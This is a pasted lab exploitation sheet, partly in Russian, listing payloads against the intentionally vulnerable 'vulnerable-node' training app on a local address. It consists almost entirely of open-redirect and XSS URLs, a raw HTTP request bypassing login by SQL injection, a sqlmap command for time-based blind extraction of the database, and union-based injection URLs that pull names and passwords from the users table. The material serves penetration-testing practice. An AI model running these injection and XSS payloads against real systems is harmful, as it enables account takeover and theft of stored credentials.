Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- https://github.com/cr0hn/vulnerable-node
- * Open Redirect:
- http://172.17.0.1:3000/login?returnurl=//google.com
- * XSS:
- http://172.17.0.1:3000/login?returnurl=/%22%3E%3Cscript%3Ealert(/xss/);%3C/script%3E%3C
- http://172.17.0.1:3000/login?returnurl=//google.com&error=%3CIMG%20SRC=X%20ONERROR=%22alert(/XSS/)%22%3E
- http://172.17.0.1:3000/products/search?q=%3Cimg+src%3Dx+onerror%3Dalert(/xss/)%3E
- * SQL Injection (auth bypass):
- POST /login/auth HTTP/1.1
- Host: 172.17.0.1:3000
- User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
- Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 78
- username=admin&password=qwerty%27+or+%271%27%3D%271%27+limit+1+--+x&returnurl=
- * Time Based SQL Injection (auth; database dump):
- Раскручиваем с помощью sqlmap вот таким запросом извлекаем имя базы, пользователя и все таблицы:
- ~/soft/sqlmap/sqlmap.py -r nodejs-vuln.txt --techniq T --current-user --current-db --tables
- Parameter: #1* ((custom) POST)
- Type: AND/OR time-based blind
- Title: PostgreSQL > 8.1 AND time-based blind
- Payload: username=admin&password=' AND 2583=(SELECT 2583 FROM PG_SLEEP(5)) AND 'owAo'='owAo&returnurl=
- nodejs-vuln.txt:
- POST /login/auth HTTP/1.1
- Host: 172.17.0.1:3000
- User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Referer: http://172.17.0.1:3000/login?returnurl=&error=No%20data%20returned%20from%20the%20query.
- Cookie: connect.sid=s%3ApyGpstoiNO2ClZ4dVErSZzTRia-2fkt8.6rfooOeqIEQpbsIj7QQWmuCTbcymiwrndPUkwrpTnig
- Connection: close
- Upgrade-Insecure-Requests: 1
- Content-Type: application/x-www-form-urlencoded
- Content-Length: 78
- username=admin&password=*&returnurl=
- * SQL Injection (union based; product detector style):
- http://172.17.0.1:3000/products/detail?id=1%27%20and%20%273018%27%3d%273018
- http://172.17.0.1:3000/products/detail?id=1%27%20or%20%273018%27%3d%273018%27%20limit%201%20--%20x
- http://172.17.0.1:3000/products/detail?id=1' or '3018'='3018' limit 1 -- x
- Burp SQL detector style:
- http://172.17.0.1:3000/products/detail?id=1' and '3018'='3018
- http://172.17.0.1:3000/products/detail?id=1' and '3018'='3019
- http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,%272%27,%273%27,%274%27,%275%27%20from%20users%20limit%201%20--%20x
- http://172.17.0.1:3000/products/detail?id=1423123%27%20union%20select%20%271%27,name,password,%274%27,%275%27%20from%20users%20limit%201%20--%20x
- http://172.17.0.1:3000/products/detail?id=1423123' union select '1',name,password,'4','5' from users limit 1 -- x
- SQL Injection:
- http://172.17.0.1:3000/products/search?q=%27%20and%201=2%20--%20x
- http://172.17.0.1:3000/products/search?q=' and 1=2 -- x
- http://172.17.0.1:3000/products/search?q=' and 1=1 -- x
- Повсеместное CSRF
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement